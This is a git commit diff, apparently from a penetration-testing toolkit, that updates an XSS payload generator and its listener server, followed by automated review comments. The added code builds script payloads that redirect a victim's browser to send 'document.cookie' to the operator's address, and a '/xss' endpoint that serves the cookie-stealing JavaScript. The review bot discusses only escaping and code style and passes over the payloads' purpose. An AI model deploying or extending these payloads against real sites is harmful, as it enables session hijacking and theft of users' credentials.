xss_handler + fileserver update

Roman Hergenreder 2021-05-07 23:52:08 +02:00
parent eadff755a0
commit 494a1e0f4b
2 changed files with 15 additions and 4 deletions

@ -50,6 +50,7 @@ class FileServerRequestHandler(BaseHTTPRequestHandler):
body = self.rfile.read(int(contentLength)) body = self.rfile.read(int(contentLength))
print("==========") print("==========")
print("%s %s %s" % (self.command, self.path, self.request_version))
print(str(self.headers).strip()) print(str(self.headers).strip())
if body: if body:
print() print()
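Review bot: The added `print("%s %s %s" % (self.command, self.path, self.request_version))` writes the client-supplied request target to the operator's terminal unescaped, so control characters in a request (ANSI escape sequences, for instance) would be interpreted by the terminal or would corrupt a captured log. Formatting the path with `%r`, as in `print("%s %r %s" % (self.command, self.path, self.request_version))`, makes non-printable bytes visible instead. The existing `print(str(self.headers).strip())` has the same property and could be treated the same way. The enclosing handler method starts and ends outside this hunk.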

@ -6,11 +6,16 @@ import http.server
import socketserver import socketserver
from http.server import HTTPServer, BaseHTTPRequestHandler from http.server import HTTPServer, BaseHTTPRequestHandler
def getCookieAddress(address, port): # returns http address
def getServerAddress(address, port):
if port == 80: if port == 80:
return "'http://%s/?x='+document.cookie" % address return "http://%s" % address
else: else:
return "'http://%s:%d/?x='+document.cookie" % (address, port) return "http://%s:%d" % (address, port)
# returns js code: 'http://xxxx:yy/?x='+document.cookie
def getCookieAddress(address, port):
return "'%s/?x='+document.cookie" % getServerAddress(address, port)
def generatePayload(type, address, port): def generatePayload(type, address, port):
@ -23,6 +28,7 @@ def generatePayload(type, address, port):
if type == "script": if type == "script":
payloads.append('<script type="text/javascript">document.location=%s</script>' % cookieAddress) payloads.append('<script type="text/javascript">document.location=%s</script>' % cookieAddress)
payloads.append('<script src="%s/xss" />' % getServerAddress(address, port))
if len(payloads) == 0: if len(payloads) == 0:
return None return None
@ -41,7 +47,11 @@ class XssServer(BaseHTTPRequestHandler):
def do_GET(self): def do_GET(self):
self._set_headers() self._set_headers()
self.wfile.write(self._html()) if self.path == "/xss":
cookie_addr = getCookieAddress(util.getAddress(), listen_port)
self.wfile.write(cookie_addr.encode())
else:
self.wfile.write(self._html())
def do_HEAD(self): def do_HEAD(self):
self._set_headers() self._set_headers()
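Review bot: The new `/xss` branch in `do_GET` reads `listen_port` and `util.getAddress()` from module scope, and neither is defined in the visible lines, so the handler presumably only works once the script's start-up code has set them. Passing the address and port into the handler would make that explicit, or the dependency could be documented with a comment such as `# listen_port is assigned by the entry point before the server starts`. The exact comparison `self.path == "/xss"` also falls through to `_html()` for any request that carries a query string, which is worth a comment if intended. The two helper comments (`# returns http address` and `# returns js code: ...`) sit above the `def` lines and would read better as docstrings inside `getServerAddress` and `getCookieAddress`.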